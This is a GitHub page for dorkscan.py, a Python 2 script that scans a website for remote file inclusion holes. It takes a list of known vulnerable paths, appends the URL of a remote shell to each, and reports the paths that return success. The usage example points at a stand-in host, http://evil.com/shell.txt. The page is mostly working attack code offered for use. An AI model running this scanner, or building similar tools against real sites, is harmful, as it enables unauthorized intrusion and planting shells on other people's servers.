-
Notifications
You must be signed in to change notification settings - Fork 5
/
dorkscan.py
executable file
·101 lines (84 loc) · 2.52 KB
/
dorkscan.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/usr/bin/python
#DorkScan v1.0 takes a list of known RFI vuln. paths and
#checks the http response. I called it dorkscan because
#the list I use comes from a list of dorks.
#http://www.darkc0de.com
##d3hydr8[at]gmail[dot]com
import sys, httplib, time, re
def getserv(path):
try:
h = httplib.HTTP(host)
h.putrequest("HEAD", path)
h.putheader("Host", host)
h.endheaders()
status, reason, headers = h.getreply()
except:
print "\n[-] Error: Name or service not known. Check your host.\n"
sys.exit(1)
return status, reason, headers.get("Server")
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def title():
print "\n\t d3hydr8[at]gmail[dot]com DorkScan v1.0"
print "\t----------------------------------------------"
if len(sys.argv) != 4:
title()
print "\n\t[+] Usage: ./dorkscan.py <site> <list> <shell>\n"
print "\t[+] Option: -verbose"
print "\t[+] Ex. ./dorkscan.py example.com dorks.txt http://evil.com/shell.txt -verbose\n"
sys.exit(1)
title()
host = sys.argv[1]
lst = sys.argv[2]
shell = sys.argv[3]
for arg in sys.argv[1:]:
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
else:
verbose = 0
if host[:7] == "http://":
host = host.replace("http://","")
if host[-1] == "/":
host = host[:-1]
print "[+] Getting responses"
okresp,reason,server = getserv("/")
badresp = getserv("/d3hydr8.html")[:1]
if okresp == badresp[0]:
print "\n[-] Responses matched, try another host.\n"
sys.exit(1)
else:
print "\n[+] Target host:",host
print "[+] Target shell:",shell
print "[+] Target server:",server
print "[+] Target OK response:",okresp
print "[+] Target BAD response:",badresp[0], reason
print "[+] Scan Started at",timer()
if verbose ==1:
print "\n[+] Verbose Mode On"
try:
lines = open(lst, "r").readlines()
print "\n[+]",len(lines),"dorks loaded\n"
except(IOError):
print "[-] Error: Check your dorks list path\n"
sys.exit(1)
vulns = []
print "[+] Scanning...\n"
for line in lines:
if line[0] != "/":
line = "/"+line
status, reason = getserv(re.sub("\s","",line[:-1]+shell))[:2]
if verbose ==1:
print "[+]",status,reason,":",line[:-1],"\n"
if status == okresp:
vulns.append(line)
print "\t[!]",status,reason,":",line[:-1],"\n"
if status == int(401):
print "\t--",status,reason,":Needs Authentication [",line[:-1],"]\n"
if len(vulns) == 0:
print "[-] Couldn't find any vuln. paths\n"
else:
print "[!] Found",len(vulns),"possible vulnerabilities, check manually.\n"
for vuln in vulns:
print "\t[+] ",vuln
print "\n[+] Scan completed at", timer(),"\n"